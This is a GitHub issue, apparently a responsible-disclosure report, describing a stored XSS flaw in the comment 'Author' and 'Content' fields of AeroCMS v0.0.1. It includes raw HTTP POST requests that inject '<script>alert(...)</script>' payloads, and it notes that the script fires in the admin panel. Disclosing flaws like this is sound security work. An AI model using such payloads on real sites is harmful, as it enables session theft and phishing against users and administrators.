Skip to content
This repository has been archived by the owner on May 8, 2023. It is now read-only.

Stored XSS Vulnerability on AeroCMS v0.0.1 #11

Open
rahadchowdhury opened this issue Mar 13, 2023 · 0 comments
Open

Stored XSS Vulnerability on AeroCMS v0.0.1 #11

rahadchowdhury opened this issue Mar 13, 2023 · 0 comments

Comments

@rahadchowdhury
Copy link

Description:
I found Stored Cross site scripting (XSS) vulnerability in your AeroCMS (v0.0.1) post comments section "Author" and "Content" field. When I use malicious code or use any xss payload then the browser give me result. Because a browser can not know if the script should be trusted or not.

CMS Version:
v0.0.1

Affected URL:
http://127.0.0.1/AeroCMS/post.php

Steps to Reproduce:

  1. At first open any post.
  2. then fill up comments section and your request data will be

POST /AeroCMS/post.php?p_id=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
Origin: http://127.0.0.1
Cookie: PHPSESSID=qtj8dhp0jub18i2agkfm4bf5ea
Connection: close

comment_author=test&comment_email=test@test.com&comment_content=test&create_comment=

  1. "comment_author" and "comment_content" parameters are vulnerable. Let's try to use any XSS payload in "comment_author" and "comment_content" parameters and your request data will be

POST /AeroCMS/post.php?p_id=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
Origin: http://127.0.0.1
Cookie: PHPSESSID=qtj8dhp0jub18i2agkfm4bf5ea
Connection: close

comment_author=test"><script>alert(111)</script>&comment_email=test@test.com&comment_content=test"><script>alert('XSS')</script>&create_comment=

1
2

  1. Now login admin panel and go to "Comments" Menu
  2. You will see XSS pop up (If admin approve comment so XSS pop up execute in post section).

3
4
5

Proof of Concept:
You can see the Proof of Concept. which I've attached screenshots and video to confirm the vulnerability.

Stored.XSS.on.AeroCMS.mp4

Impact:
Attackers can make use of this to conduct attacks like phishing, steal sessions etc.

Let me know if any further info is required.

Thanks & Regards
Rahad Chowdhury
Cyber Security Specialist
https://www.linkedin.com/in/rahadchowdhury/
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@rahadchowdhury